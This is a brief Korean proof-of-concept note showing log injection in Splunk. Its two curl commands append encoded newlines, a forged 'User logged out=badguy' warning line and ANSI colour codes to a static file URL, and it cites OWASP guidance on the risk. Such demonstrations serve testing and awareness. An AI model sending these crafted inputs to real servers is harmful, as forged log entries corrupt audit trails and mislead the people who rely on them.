
개념 증명(PoC)으로, 조작된 URL 매개변수를 통해 Splunk에서 로그 주입 및 오염을 시연하며, OWASP 로그 주입 위험을 강조합니다.
모르겠어, 그냥 친구가 보내준 거 보고 대충 막 자바스크립트 코드를 적기 시작했어.
이 글을 읽어주세요: OWASP Log Injection
정적 파일을 찾아 전달하고 임의의 파라미터를 추가하세요.
그래서, 다음과 같이 전달합니다: curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
임의의 줄바꿈이 나타나면 이는 로그 오염입니다. 단순한 '정상적인' 오염일 수 있어 괜찮다고 느낄 수도 있지만, 집중적으로 표적이 되면 성가실 수 있습니다.